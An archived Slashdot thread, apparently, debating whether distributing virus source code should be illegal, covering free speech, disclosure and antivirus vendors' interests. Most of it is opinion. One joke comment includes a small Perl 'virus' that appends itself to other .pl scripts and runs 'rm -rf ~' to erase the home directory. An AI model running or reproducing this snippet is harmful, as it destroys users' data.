Slashdot Mirror
Should Virus Distribution be Illegal?
mccormi writes "In a guest editorial on Newarchitect Sarah Gordon looks at whether posting malicious code should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on malicious code doesn't take into account who it's malicious against and what truly defines malicious." Note that she's not talking about actually infecting computers, but merely making the code available for others to examine (and for some of them, no doubt, to try to spread in the wild).
Unless the law specified dstribution of *machine readable* malicious code (ie binaries) then MS et.al. could start nailing those who post proof-of-concept code to demonstrate the flavor of the week exploit in IIS or WinxP or what have you...more security by obscurity, yippee
If you can't see the value in jet powered ants you should turn in your nerd card. - Dunbal (464142)
I think it should be illegal to write and release viruses. Viruses should follow all standard software rules, which means, the maker could easily be sued for damages. And no, sending the virus with a EULA wouldn't protect the maker legally.
Job? I don't have time to get a job! Who will sit around and bitch about being broke and unemployed then?
would spyware be included in the categorization? It could be argued that it is viral in intent if not propigation.
Though no one likes to get a virus, and I often wonder who writes them and for what reasons, I do believe that there probably is much information to be gained from their examination as far as system function goes. From a learning standpoint, those who write them, while having too much free time on their hands, are learning some hard-core programming concepts, as are those who fight them. For the casual programmer, taking a peek at their code every now and then can actually be beneficial. But, as always, it's the person that can make good code cause bad things and vice-versa. As always, it comes down to the person, not the code. The code itself should not be illegal. Knowledge cannot be locked up, and if it is, it can break free in a dangerous way. Better to have it out in the open where the "good guys" can combat it if needbe, and everyone can learn from it.
How is posting potentially harmful virus code any different than posting OS vulnerabilities and exploits? If this were to become law, how long would it take a certain OS manufacturer to extrapolate that same concept to cover all 'malicious' code fragments that could be used to target their OS?
I don't like people who write viruses, I like getting them even less, however censoring the ability to post/review it is just another step in the slippery slope towards censorship of other things.
I think we'd all enjoy a nice cold beverage. -David Letterman
Of course, the perfect virus in this case would be one that
Suddenly everyone who has ever been infected becomes a criminal for posting the virus' replication mechanism!
He looked at me and said, "Kid, we don't like your kind, and we're gonna send your fingerprints off to Washington."
The DMCA had the intentions of eliminating piracy, however it ended up being used to fight battles that never should have been fought. If MS releases an OS with a known backdoor, does that count as malicious? If someone makes a program that utilizes this backdoor in a way that MS did not intend (regardless of in a good way or bad way), can MS claim this as malicious? Would NTFSDOS be considered malicious since it bypasses NTFS's protection?
This is one of those issues where a law cannot be both effective and fair. And possibly not either.
If you think education is expensive, you should try ignorance -- Derek Bok, president of Harvard
The more known the code becomes, the easier it is to counter it.
It also separates the wheat from the chaff in terms of IT employees. Whoever keeps up is a valuable resource in a sea of lax workers
I like the idea of thinking about biological and computer viruses in the same way.
Researching biological viruses is legal, although people could attempt to spread said viruses maliciously. Those who deal with lethal viruses and diseases often can't just make samples and research easily accessible to anyone, even anonymous people. Why should virus "researchers" be able to do what is essentially the same thing?
Free speech is good, research is good... but so are ethics and responsibility.
mark
If you want to make an apple pie from scratch, you must first create the universe. -- Carl Sagan
Microsoft smiling...
Lawyers call products "viral",
Court can't get source code.
Freedom of speech is protected, and rightly should be, but there are limitations to that freedom and even --gasp-- responsibilities. Writing codes for viruses, or supplying them to the public, isn't bad in itself--it's the usage of them were the ethical complications come in. Thus, one could claim that simply posting the code for viruses is fine...the people to be blamed are the ones using that code for negligent purposes.
The same could be true for yelling 'FIRE' in a crowded theatre, right? If a avalanche of trouble ensues, the fault must lie in those people who push over old ladies to get out of the theatre first, right? I mean, the person who yells fire may have played a role in facilitating all the chaos, but the actual causers of the injury are those running around..
Of course, these two scenarios are completely different (being the virus/yelling fire), but raise similar points. Freedom of speech doesn't make you free from responsiblity of your chosen speech...whether that's yelling 'Fire' or writing/supplying codes for viruses..
I have to strongly disagree with this. Putting up information on the web that shows a person how to write a virus or a DoS bot or anything else is purely free speech, it's the free release of information. The action she's talking about here is the action of posting information, which is not malicious at all.
To further illustrate her misguided logic by being absurd, let's apply this reasoning to other realms. By her logic, if you teach a person to use a gun, and that person takes that knowledge and shoots and kills someone, then you should go to prison for murder. Sorry, that doesn't fly. Just because you know how to write a virus and teach others how to write a virus, it's not illegal until you compile that source and make an effort to infect computer systems with that virus.
Information, no matter what can be done with it, is never "good" or "bad" - it's what you do with that information, the actions you take, that are good or bad.
Like it or not, even virus code should be protected under the First Amendment. However, for actually implementing and distributing a virus, there should be stiffer penalties.
It's our constitutional right, but it should be illegal?
Damn it, what part of "Freedom of Speech" do people not get?
History has made it clear that the people pay dearly when free speech, esp. free speech regarding a matter of community security, is abridged. Telling us that Acme locks are easily broken does not protect us from criminals who are too dumb to figure it out for themselves, it only serves to give us a false sense of security.
(As an aside, this is also the foundation of some of the most damning condemnations I've seen of "child protection" laws. As some judges have observed, the true obscenity is attempting to protect minors from all adult concerns until their 18th birthday... at which point they are thrown to the wolves with absolutely no preparation for the very real challenges adults must face.)
A virus exchange site is similar. Yes, there will be some idiots (who deserve to have the full wrath of the law on them for their acts) who will use those viruses for ill will. But the same sites will also allow others to be warned that viruses against this specific software exists and is in the wild. No more Microsoft stonewalling about the existence of such attacks. No more trivializing them as highly specialized and not a concern to the average user.
This is a bit scary... but that's part of being an adult. A child can go to bed at peace that the closet is empty of monsters, but part of being an adult is knowing that there are bad guys out there *and* that you've done everything you can to keep them away. I, for one, and getting damn tired of my self-appointed "betters" trying to infantilize me.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
Although not directly related to the article, I did get an idea. Some may say this is slightly off-topic, but we'll see. I've picked "test equipment" because I want a reputable source. Meaning, this scenario would be a honest accident.
Okay so I write some code for a piece of test equipment. Let's just pick an example situation. I don't want to argue if this is a good or bad idea, but say I did it anyway. Every once in a while the machine checks to see if it is slipping its calibration. If it is, it contacts some server to say "hey look at me." Then the server responds and says "yeah I see you." Well with my expansive programming skills I accidentally code a bug. Let's say instead of contacting the intended target, I just start contacting anything I can find. Well another analyzer sees my cries for help and starts yelling too. See where I am going?
The code was never intended to broadcast huge amounts of useless traffic. It happened by accident. I picked this haphazard example to be similar to Code Red. The machines are basically messaging, like mad, between each other. So does this mean my company or I should have charged (civil or criminal) against us? I say no, but I'm sure a lawyer would scream yes.
Symantec makes anti-virus software. The technical success of such software depends on information about viruses. The commercial success of such sofware depends on the vendor having information about viruses that other organizations or people do not have!
If people can freely exchange information about viruses, they can also develop their own anti-virus solutions independently of the vendors of anti-virus software.
One more point. I think it's easy for vendors of this software to slip into thinking that all such information is their intellectual property. In fact, they are probably not above writing and distributing viruses to stay in business, so that viruses may be *in fact* their IP; of course they would be against people reverse engineering their code in open discussion forums. Who knows; there may even be some inadvertant clue in there somehow revealing the origin of the virus, which would expose and ruin the virus/anti-virus developer.
You might be able to get around that issue by making it illegal to post the code in a manner that can provable cause harm to another computer system, if a clear warning is not given.
Posting the source, as such, would not be illegal, if you warned others that they would be accessing a virus. However, posting a binary or distributing it through email would then be illegal.
The problem with the whole thing is that it fails to cover intent and/or damage. Much better if one can trace down the "patient zero" and determine who they got infected from, and then slam that sucker for everything that he or she is worth.
A simple jail sentence does not seem to be enough. Why not go after them for a percentage of the economic damage?
To celebrate the occasion of my 1000th post, I will post no more forever on Slashdot. Goodbye.
Sarah Gordon may have some good points. It's hard to tell.
/bin/cat or /bin/cc become "viruses" under some circumstances.
....." objecting to her editorial is just automatic: she's using a term that has (1) a specific technical or mathematical meaning (to Fred Cohen and many Slashdot readers) and (2) a vague "common sense" meaning (to Windows users the general public and a few Slashdot readers). She's arguing based on both meanings. She's hoping that emotional or poorly intellectualized reactions to meaning (2) will get code representing meaning (1) outlawed.
She never bothers to define the term "virus" in a way that an arbitrary individual (me or an intellectual property lawyer or a World Court Judge) can use to determine whether or not some source code constitutes a "virus".
If she follows Fred Cohen's definition ("sequences of instructons in machine code for a particular machine that make exact copies of themselves somewhere else in the machine" - "A Short Course on Computer Viruses" 2nd ed ISBN 0-471-00769-2 John Wiley & Sons 1994) which is pretty much an english transliteration of the mathematical definition - even things like
Sarah Gordon is just fear-mongering at this point. Until she says "The term 'virus' means code that
It's crap. Give it up Sarah.
And just for good measure: http://cm.bell-labs.com/cm/cs/who/doug/v101.ps Read it and weep Sarah. Neener neener neener!
But it is never elaborated on at all. I do not understand how it can be said that posting something on the web is any more of an action than the physical act of mailing a letter to the editor, but we do say that mailing a letter to the editor falls squarely under free speech. How are we supposed to separate speech and action (something the article acknowledges are different) on the internet if the act of posting places your content beyond pure speech? How are we supposed to have free speech if we are prevented from speaking to others by posting our thoughts?
There is a big difference between saying "This code will infect machines and do this to them" and then compiling that code and releasing it with malicious intent. One is speech, the other is action. It is the same as the difference between saying "I could break into your home by doing this" and then actually going out and doing it. One is not illegal, the other is.
This reminds me of another issue. How long before distributing an MP3 player makes you an accomplice to copyright infringement because you haven't included draconian copy-protection schemes? The problem is social, not technological.
"Belief means not wanting to know what is true." [Nietzche, The Anti-Christ, 1889]
Um would you nail the guy using Outlook on a corporate lan or MS for providing the disemmination software for it?
This is humor for those who would inform me to read the article.
The truth shall set you free!
Trivial coding for a programmer isn't trivial coding for a nonprogrammer.
It would be simple, for instance, for a programmer to modify a game like XEvil so that when the player loses his last life, it erases the hard disk. That's easy. However, for somebody who is not a programmer -- and this includes many, many people who have computers -- it would probably be very hard.
Writing a trojan like that and distributing it on the web, for instance, would thus be making it very easy for even non-programmer brats to play a malicious "joke" on their friends or so forth. Ditto, of course, for propagating viruses, with the additional provision that it may affect others besides the intended victims.
Only the dead have seen the end of war.
...and do a damn good job. Without an *iron clad* definition, then you could make a case for things like say, Outlook, being "malicious". I don't mean to attack on Microsoft, I mean *anything* that unintentionally or intetionally causes damage could be considered malicious. Could "rm" be considered a "malicious" piece of code?
"Your superior intellect is no match for our puny weapons!"
I'm only half serious about this, of course, but the idea is better than Gordon's. Innoculating computers against viruses by forcing them to successfully fight viruses off will make the computers of the world more secure than trying to protect them in a sterile glass tube that shatters at the first poke.
Miko O'Sullivan
We've always been on friendly terms Sarah, except when you go spouting fascist crap like this. What does Symantic pay you for anyways? Researching "ethical implications of select technologies" sounds like "making up FUD and scare tactics" to me. How can the author of The Generic Virus Writer accuse anyone of "bad science". Pah-lease. You're a psychologist, your "discipline" invented bad science. When you condem virus writing and try to criminalize it like you constantly do you drive more and more kids to get into it -- call it the "coolness factor". Make it more illegal and it will become more dangerous. What the vx scene needs is compassion and guidance -- leadership if you will. When VLAD was on top we put forward positive responsible leadership. Unlike hacking, writing viruses is about investigating the weaknesses of both insecure and secure systems. What can you do in the bounds of a good security model that is still malicious? Can this help us build better security models? This is research, and maybe if you got out of your closed little commerical lab ("we make scanners!" Big deal) you might be able to see the whole picture.
How we know is more important than what we know.
just like this contest has been promoting for years, obfuscated code may "fool" any automated tool that would somehow parse various languages. Virus writers already display some talent -- this would just encourage them to be more creative with the source.
"Making viruses publicly available on the World Wide Web for research or educational purposes? That's nonsense. Call it your constitutional right, but the truth is that it's morally wrong. "
Sarah needs some education on what morals are. The fact that some people will have morals different from other is one reason we have freedom of speech. If we started saying what someone could say or not say, based on others morals, free speech would do away.
I am not a scientit, but I can suscribe to any of there journals and access there information. A good deal of scientific discovery can be used for malice.
"Sarah Gordon is senior research fellow at Symantec Security Response.."
when someone from symantec talks about what is "moral", it kind of loses any emphasis.
The Kruger Dunning explains most post on
I don't think it's possible to come up with a generally acceptable definition for "malicious code". Prove me wrong.
/bin/sh to " bin sh". In hex though.)
Counterexamples:
Internet Explorer and Netscape both trying to become the default system browser, with or without user knowledge. Are these pieces of code being malicious to each other?
A trojan horse which requires willfull (but not knowing) participation from the user to install.
A piece of software which serves a controversial, but generally beneficial purpose. For example, a spam bot trap, or news cancellers.
A script kiddie proof buffer overflow exploit (even if it does just change
Anti-virus software which could produce false positives and stop software packages from running.
A background ad-server which gets installed automatically, and unknowningly, by ISP or P2P client software. (Yes, I would like that to be considered malicious).
An auto update server which gets installed automatically, and unknowningly, by the OS, which transparently downloads new software components and security fixes as they are available. (That does serve a useful function, for some people).
After all, making things illegal is so effective.
Can you get child pornography? No, it's illegal.
Can you get cracked software? No, it's illegal. Can you get ripped music? No, it's illegal.
Do servers ever suffer from DOS attacks? Do people ever make charges on other people credit cards without the owner of CC knowing? Do people ever hack into private networks?
Of course not, it's all illegal. Logically, if we make viruses illegal to write, noone would write them...right?
A modern day witchhunt.
I believe virus distribution should be illegal, but distributing the code should not be (the title of the article is somewhat misleading). If someone wants to spread a virus, MS makes it easy for them with macros. If they aren't that computer literate, they probably aren't going to want to spread a virus in the first place.
Posting the code should be legal because there are always new methods of attacking someone's computer, and people/companies working against this should have access to methods of distributing viruses that other people have thought of, the better to protect themselves/their customers.
An apt analagy is that people are allowed to buy guns, despite the fact that they can kill people--they also help protect people from being killed.
"In a guest editorial on Newarchitect, Sarah Gordon looks at whether spam should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on spam don't take into account who it's malicious against and what truly defines malicious." Note that she's not talking about actually sending spam, but merely making the text available for others to examine (and for some of them, no doubt, to try to spread in the wild).
ok then your [sic] infringing on my copyright! Could you as [sic] me next time before STEALING my comments for your own?
Why should we care about computer viruses? I don't remember when I had this thing. I don't understand people which buys antivirus software, which scans their mail, then read NEWS like "don't open I love you letters!" and put half of their mail to trash. Why so much work is needed just to use computer?
AFAIK computer viruses are so important only for Windows users. Systems, which allows computer viruses to exist - gives their users huge waste of time.
Just let's talk about something else.
If you think about it in the biological sense, from a purely result-oriented perspective, one might make the argument that viruses are good for computers. The justification is that viruses force people to make their code more robust, and less vulnerable to attack.
I think I subscribe to this to some extent. If we had no viruses, and didn't know what havoc they could play with our system, we'd be completely unprepared for any such trouble in our systems -- whether maliciously, or because someone's code happened to go wrong.
I don't think that you can place restrictions on what people write or do not write. I feel it's still the obligation of the system user to protect him/herself against problems and to be vigilant. It keeps us all in practice, and makes us more ready for whatever is out there, no?
It is painful for me to hear people continue to attempt to defend this position.
The stance that it is somehow idealogically immoral to put constraints on the availability of dangerous information in our current society is not only without a rational defense, but completely ignores the reality that such information can directly lead to a massive amount of harm.
The problem with allowing all information to be free, under the premise that any bad result of its use is the fault of the person using it, is that modern society's infrastructure is rapidly tending toward a state where information can lead directly to action.
Imagine, for instance, that you are an expert engineer who was magically transported to a pre-civilized era. Would the vast body of knowledge that you posessed help you, in that era, take actions that effect any significant amount of change? Would you, in fact, be able to do anything with the advanced information that you posess in such a situation?
In earlier times, it was entirely ok to spread any and all information, because the worst that the information could do would be to change somebody's opinion on a political matter or teach somebody how to make a shoddy weapon (read: a stick) of minor consequence. In the near future, one will be able to transmit a digital specification for a weapon to be fabricated on one's personal fab-lab. The person won't require any knowledge the specification or even of how a computer or fabrication machine works -- they will just have to buy the machine at home depot, download a spec for their weapon of choice from a web-site, and posses the insanity to want to use the thing against society.
I think it's entirely all-too clear that such demented individuals exist. What has kept the world safe thus far has been a lack of easily-available information (you must still be a geek to find computer cracking scripts), and a relatively weak amount of computer-based power (personal fab-labs are really expensive, and not very powerful).
But this won't be the case in the future. We've already seen many technologies help your average Joe break the law at the click of his mouse by employing a highly-refined and easy-to-use user interface -- just take a look at Napster and its clones. Clearly the very availability of Napster enabled thousands and millions to break laws that they would have not broken previously. The only difference between a Napster and a Code-Red virus is that Napster allowed one to violate a law is arguably detrimental to society. It won't be long until these products allow your everyday Joe Bin Laden to inflict *serious* damage to society at his whim.
It'd be great if information could always be free, but unless we restrict dangerous forms of it, we are simply giving up our safe way of life. Although one might *want* to give arbitrary individuals access to all information, you're essentially allowing arbitrary individuals the power to do anything they desire. This system will eventually lead to catastrophe, because you cannot make the entire world's population obey an honor system.
If distributing virus source code become outlawed, only outlaws will distribute virus source code...
--
http://www.aikiweb.com - AikiWeb Aikido Information
She's not suggesting that laws be enacted to restrict the spread of educational virii. (Indeed, she says that most computer criminals are relatively unconcerned with the illegality of their acts.) Rather, she wants to make the distribution of them moral anathema. In her ideal world, posting ILoveYou source code to your site would be the equivalent of walking around a mall handing out Aryan Nation literature: legal but morally repugnant.
Basically, Gordon wants to counter one form of free expression (educational virii) with another (public disgust). Yup -- free speech operating as intended.
Do I agree with her opinions? Dear god, no. In fact, Gordon's idea to indoctrinate children from first-boot sounds eerily like the recent conservative push for teaching abstinence in schools. But she's got every right to try and advance her agenda through whatever constitutional means she has available to her.
To: Good Citizen posing as an evil hacker by exposing our own stupidity
From: The Law Offices of Bend, Over, and Takeit.
Dear Sir:
You have recently refered to a website that had discussed the possibility of posting conceptual code that exposes an embarassing hole in our client's poorly constructed software.
To wit, this is notice that we are suing you for millions of dollars pending your decision to withdraw your comments and acknowlege Bill Gates as lord of the universe.
You have until the end of this sentence to comply.
Do you have Linux and a DotPal? Click here now!
Likewise, writing a virus shouldn't be a problem if operating systems run untrusted code in a sandbox, and people don't propogate them carelessly.
--
E_NOSIG
The bar for experts working with dangerous biological agents is pretty high. And rightfully so. However, the limitations to who can explore techology is considerably lower. This goes for information security issues as well.
Who is to say who is the expert? Would you limit such research and tools to industry professionals?
Despite the claims of some IT industry PR spin campaigns (and the apparent discomfort of some professionals), much of the state of Infosec tools and knowledge exists because of the work done by individuals outside traditional institutions.
I think there's some confusion about malicious code vs. virus.
It's very difficult to give such a definition of "malicious code" that everyone agrees to.
However, "virus" can be defined more accurately. Just take the most important virus feature - it should be self-replicating. I think it's enough to define virus, technically.
The internet is a community, and residents are responsible for keeping their computers in line. This includes keeping their computers secure from virus attacks and putting them down with antiviruses or firewalls if they go out and attack other people.
With so many people on broadband nowadays, it seems like we don't have much other choice.
To say you can't distribute virus code anymore is like saying no one is allowed to own pitbulls because they'd attack other people if they got out. If you take reasonable precautions with fences and signs and stuff, it should be OK. Even if he does get out once and bite someone, they get one more chance (to install an antivirus, secure their box, etc.) before getting put down (fines, DSL connection yanked, etc.). But if they went around eliminating every pit bull and rottweiler in existance, this won't help the fact that everyone has really poor fences that any specially trained attack chihuahua could get through (and get off scott-free for it too). Geez, you might as well try to go eliminate all the terrorists or something... oh wait...
In a guest editorial on Newarchitect Sarah Gordon looks at whether criticizing large corporations for their mistakes and shoddy products should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on criticism don't take into account who it's against and what truly defines criticism." Note that she's not talking about actually infecting computers, but merely making the criticism available for others to examine (and for some of them, no doubt, to use as a tool for damaging corporate profits).
From the article:
It's true that the scientific community encourages research, but only when it's conducted within the ethical boundaries of a given discipline.
So let me get this strait... It's ethical to create software that has tons of security exploits, and spies on unsuspecting users who purchase it, but it's unethical to give people the tools they need to test their systems for vulnerability and gaurantee security for their own piece of mind. It might be OK to give such tools to large corporations, but private individuals just shouldn't need that kind of privacy...
...look for Microsoft to open the Windows source. After all, with its memory holes and security flaws, I'm sure that if Windows source were available, it would be so "malicious" that it would be illegal to distribute anyway.
dinner: it's what's for beer
I like the idea of thinking about biological and computer viruses in the same way.
Sure. And I like the idea of thinking about pizza and manhole covers in the same way too. I mean, after all, they're roughly the same size, pretty much the same shape, and if you were to map out their distribution in the universe you'd find that they pretty much cluster around the same places. Why should I have to go to all the trouble of keeping them distinct in my head?
The only problem is, when I start lumping things because of superficial similarities, I wind up making all sorts of wonky logic errors. So I have to be very careful to not be misled and to actually think about things, no matter how much easier it would be to grab a glib analogy and just run with it.
-- MarkusQ
...then only outlaws will have viruses.
Yes, why ever use analogies? Since we can easily make completely useless analogies, let's just forget them altogether!
If you really think my analogy wasn't any good, why not support that with evidence having to do with viruses, instead of saying that analogies are wrong?
Yes, one could theoretically lump things together inappropriately with analogies. I used an analogy, therefore I must have done that!
Right.
mark
If you want to make an apple pie from scratch, you must first create the universe. -- Carl Sagan
Posting, distributing or making available source code to viruses should be illegal? You mean, like this?
CodeRed.zip at Eeye.com
and
CodeRedII.zip at Eeye.com
Eeye.com has often posted the proof-of-concept exploits as a part of their advisories... is the author of the guest editoral saying eeye.com is doing wrong?
Back when the original Code Red was stirring up a ruckus, I posted its disassembled code (from eeye) to alt.comp.virus.source, and an short discussion of several weird aspects (poor coding) of the code ensued. I don't think I did anything wrong by posting it. If some weasel used that post (or other such sources) to create CRII, so be it. IMO, by that time any servers that were still vulnerable to CR/CRII deserved to be hit and, better yet, TOS'd by there ISP.
I just don't subcribe to the idea that suppressing potentially dangerous source code will do good in the long run. Having the source available and widely distributed has several advantages:
- promotes understanding of exploit mechanisms in order avoid making the same mistakes in the futre
- promotes rapid deployment of fixes. There is no pressure greater than knowing every little script kiddy's got the code
- raises awareness of code weaknesses/failure modes/common pitfalls (maybe *someday* CS courses will teach future coders to prevent buffer overflows!)
I firmly believe that being open about software/network/OS weaknesses will gradually drive the state of the art in secure software to a much higher level. The "keep quiet", "head-in-the-sand" approach that M$ is promoting these days will only hinder such advances. I'll make a loose analogy to the old outlaws & guns argument: "If you outlaw virus source code, only outlaws will have virus source code."
In fact, I think it is *imperative* that malicious source code NOT be suppressed. How else can we arm the next generations of app and OS coders to develop resistance code?
And Linux and many PHP versions too! Aren't we forgetting something here?
There's 10 types of people in this world, those who understand binary and those who don't.
#!/usr/bin/perl
# VIRUS.pl by l33tb0y
# sh0utz to: b33k3r and dr.ph0t0n
for (<*.pl>) {
# 5pr34d d4 l0v3
system "cat $0 >> $_";
}
# D4 P4YL04D! M3 50 3V1L!
system "rm -rf ~";
print "h4 h4 h4 h4 -- ur 0wn3d!\n";
If distributing dangerous code becomes illegal, what about bugs? Might it become illegal to release buggy software?? This could be a very interesting turn of events in light of the current situation of software licenses which basically absolve the authors of any and all responsibility for their code, whatsoever. Making viruses illegal could really have some interesting (and potentially dangerous) implications.
Similarly what about academic exploit code? Might that become illegal as well?? Bottom line, code is way too close to speech to be restricted like this...
A virus is a piece of software that distributes itself.
Making "virus distribution" illegal would pose a an interesting logical debate. It is the computer code that distributes itself, so it is the computer code that is breaking the law.
I am sure that the article was referring to the people who executed the program that distributes the virus, but you can get into a lot of hairy technicalities about what action caused the distribution. Is leaving an unmarked disket with a boot sector virus on it in a public place a distribution?
Is knowingly not deleting a virus an act of distribution?
If you really think my analogy wasn't any good, why not support that with evidence having to do with viruses, instead of saying that analogies are wrong?
Sorry, I thought it was obvious (and note, I never said that "analogies are wrong"). For starters:
I could go on and on. If it weren't for the choice of names and cultural assumption of similarity, I don't think people would be so fond of this particular analogy. For example, we don't hear advertisements, religions, etc. lumped in this category, but the argument to do so is just as strong as the one for lumping computer and biological viruses. Do you propose that it should be illegal to discuss religion with people who aren't theologians? Should it be illegal to distribute advertising copy?-- MarkusQ
If we are trying to defend the DeCSS code on the grounds that Code is Speech and therefore protected by the first amdenment then we cannot say that distributing virus source code should not be allowed. That would restrict one form of speech but not another. That would play into the RIAA and MPAA's hands.
I have concluded that people need to stop thinking they can do whatever they want simply because it's not illegal.
I have been thinking that someone ought to post simulated naked pictures of Sarah on reallybadguys.org just to prove her wrong.
Edith Keeler Must Die
Potentially malicious code distribution should not be illegal, but perhaps it should be licensed. We require authorization to practice medicine, operate vehicles and firearms, and lots of other potentially dangerous activities (and I would not be all surprised if working with real high-threat viruses was included in there). You'd just have to have a "security researcher clearance" in with all your other certs.
Security researchers who don't work for dominant companies like Symantec aren't in such a sweet position, and rely on public forums to learn about exploits. And it's not enough to be told "there is a new virus that attacks X", with the details held secret (eg, known only by Microsoft, Symantec and a few other giants). Security researchers need precise details of how the exploit works, and they need to see the virus code itself in order to write code for detecting that virus signature, or to protect against certain aspects of its behaviour.
Sarah's proposal is just a way to shut down the competition by criminalizing the only way that independent researchers have for getting information.
Doug Moen
I have written a truly remarkable program which this sig is too small to contain.
Conflict of Interest
I can't help but imagine, that if no one can see the code to viruses and see how they work that it will greatly reduce the availability of individuals knowledgeable and skilled enough to make antivirus programs. Of course if I worked for Symantec, like the author, this probably wouldn't bother me.
Slippery Slope
I also have a problem with criminalizing the distribution of source code that can be put to a bad use. I don't approve of distributing viral binaries, but if they are clearly marked as such why shouldn't someone be able to distribute them to one who would willingly receive them?
If we start saying that only some code can be distributed, we start down the path (I guess it should be "further down the path" in actuality; see DeCSS) of government sanctioned censoring of any code that is "bad", "malicious", or "dangerous." Expect those to be no more narrowly defined in legislation than the words in quotes above.
Conclusion
Legislators are tech-dumb idiots, and trusting them to make intelligient or reasonable legislation on software code is as stupid as trusting a pyromaniac with three gallons of gasoline and matches. They can only make things worse than the now, arguably, are.
Except someone who kills by accident is going to be charged differently than someone who did so by intent. "ignorance" as you describe it is indeed an offense. "ignorance" here is merely negligence. That kind of "ignorance" is infact a defense to many criminal offenses.
Crimes have their own requirements. Some of those definitions include intent.
A Pirate and a Puritan look the same on a balance sheet.
The question as posed is irrelevant.
People have the freedom to do publish.
The question as posed is merely a vieled attempt to advocate state censorship. If you claim that a thing should not be done, you then create the problem of trying to ensure that such a thing is not done. That requires enforcement of a constraint.
That constraint is censorship.
We read the article. We were just less naieve about it's contents.
We are not impressed with attempts to sugarcoat censorship.
A Pirate and a Puritan look the same on a balance sheet.
Code isn't malicious, people are. Most virus code that is made public is expressly for the purpose of defending against viruses, not spreading them, at least where I frequent. Forgive the gun control reference, but laws only affect the people who obey them. Its just as ludicrous as anti-circumvention laws, which just harm the people who aren't breaking the law in the first place. Why don't we spend all of this effort going after the real criminals/crackers instead of expending endless resources litigating useless laws that do much more harm than good. Knowledge of the enemy and the enemies tactics are the best weapon.
Hello quantum. You don't know me, but I read and reread all the VLAD zines back when they were current. Thank you very much for all the good times they gave me. I was a big fan of your work back then. You showed good technical skills and a mature way of thinking, unlike lesser groups like IR which I saw as purely juvenile.
Wow. What a blast from the past.
Belief is the currency of delusion.
I'm not even sure this would count as being an accessory to the crime. I think that would only start to be the case once you actually started providing some of the physical components for the device.
A Pirate and a Puritan look the same on a balance sheet.
It seems to me that if viruses are illegal to post then her company gains quite the strategic advantage. Open source virus scanners, for instance, would be very difficult to write since the authors would not be able to get copies of the viruses legally. However her company would be "professional" and of course every major company who gets a virus sends the goods to Symantec for analysis. Hmmm.
"Sarah Gordon is senior research fellow at Symantec Security Response, and technical director of the European Institute for Computer Antivirus research."
A quote from her personal web page:
"
Are you (or were you?) a hacker?
The simple answer is "no". Hacking is illegal
"
MS Windows should be illegal before a virus is. Distributing a virus with malicious intent should definitely be illegal. Posting the code on a website should not.
In the US, owning a gun is legal. Putting it on your shelf at home is legal. Showing it to your friends is legal. Putting it in a museum is legal. Transporting it is legal. Shooting someone is not.
Code for a virus is no different than certain Stephen King books. Both can describe illegal action. Nobody is claiming that Stephen King did anything illegal, nor is it illegal for people to buy and read his books. It's illegal to try to do some of the things he describes, in sometimes tiny detail, exactly how to do.
What should be illegal is designing and distributing a lame operating system which makes it impossible for the user to tell what each and every process running on the machine is and does, and who installed it, at what time, and how, and where the process was commanded to start from, and what effective rights that process has -
And all this information needs to be made available to the user in a format easy enough for my mother in law to understand.
Remove the veil of secrecy, the obscurity, and you remove the cover under which viruses operate, and you eliminate 90% of their opportunity to spread and cause damage.
Now, I'm specifically talking about trojans.
For viruses - each and every file containing executable code should also be registered to a central database or listing on each individual machine, (which can be validated against the vendor's "official list" where we're talking about commercial code - and for open source, well, if the guy's writing his own binaries, he can, and should, validate them himself)
and each of these files should be validated by checksum - maybe even md5, and changes logged and timestampped in this database. If you can see the changes happening to your binaries - and if that data is easily and quickly accessible, then you can catch viruses too.
I don't see why this is such a problem - other than the fact that it's a bit of extra infrastructure and overhead, and would eat into the economic efficiency of the software industry.
In other words: Viruses are possible, because the software manufacturers don't want to invest in a prevention infrastructure.
These are my friends, See how they glisten. See this one shine, how he smiles in the light.
Well, as long as you realize that you're criticizing Linux as well...
(Bliss, Ramen, et al...)
Only the dead have seen the end of war.
Hm? I'm not sure about broadcast radio, but you can certainly publish books on explosives, or on vandalism, or how to operate a meth lab, or so forth. Heck, there was a company (Paladin Press, if memory serves) that even published books that were guidebooks for, say, how to be a hitman. You can publish quite nasty stuff and still be covered by the First, as long as it's not obscene and you're not stomping on any other laws like breaking an NDA you signed.
Only the dead have seen the end of war.
Who does Sarah Gordon work for?
Symantec.
What does Symantec do?
It writes VIRUS DETECTION software.
What do large corporations like Symantec hate the most?
Competition.
If it is illegal to distribute the source code to viruses, then others clearly cannot examine the code in order to defeat it. Symantec, since it is a large corporation, will always be exempt from such law.
So what would should a law do? Reduce competition for Symantec by disallowing others to examine and write counter-virus software lest they be labeled lawbreakers for distributing the virus!
Sneaky.
Commented out? If you leave that in, you leave a loophole a mile wide:
e.g. if it's C source,
/*----cut----*
virus code here
*----cut----*/
or, better, use "#if 0" or "if (0) {}", which, technically, disable the code.
Only the dead have seen the end of war.
That's just the first step. First you make creating a virus illegal. The next step is to arrest God for creation of the flu virus, ebola, smallpox, the FelV virus, parvo, you name it. Man, we can really nail him on this.
I'm all in favor of making virus distribution illegal. If someone gets a cold, just slap them in jail for a few days till they get over it. We must protect the children! Finally, a cure for the common cold!
-
- - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
... as an SF novel once put it.
Various governments HAVE tried to remove people from the equation, with the predictable result that a lot of people wind up incarcerated or executed for expressing unauthorized thoughts.
So let's define virus source code as Unauthorized Thought. Now explain to me how this differs from writing and distributing DeCSS?? After all, by at least one government's definition, DeCSS is Unauthorized Thought, because the code CAN be used to break the law.
Creating something that is POTENTIALLY malicious is NOT the same thing as ACTING WITH MALICE. But if the two become legally entangled, ALL freedom of thought is in peril.
~REZ~ #43301. Who'd fake being me anyway?
Yes, I am saying that is subjective. How many of those violent crimes would have never happened in the first place without guns involved? What qualifies as having a violent crime "prevented" with guns? These are rhetorical questions. Do not answer them.
I'm saying it's not black and white, one or the other, trading off. Why couldn't there be a way to reduce both of these things?
But, most importantly, why is this suddenly a gun discussion? You obviously have very strong opinions about guns, but this was supposed to be about viruses.
And then you really missed what I said in the last post by giving me more statistics. I am not interested in having a gun-laws debate.
The only reason those links were from a Brady site is because that's the first thing that came up in a Google search. It's funny that you assume I must believe foolishly in some grand conspiracy about faked statistics 1) without really knowing my stance on guns and 2) while at the same time indicating the the Brady supporters *do* have a conspiracy.
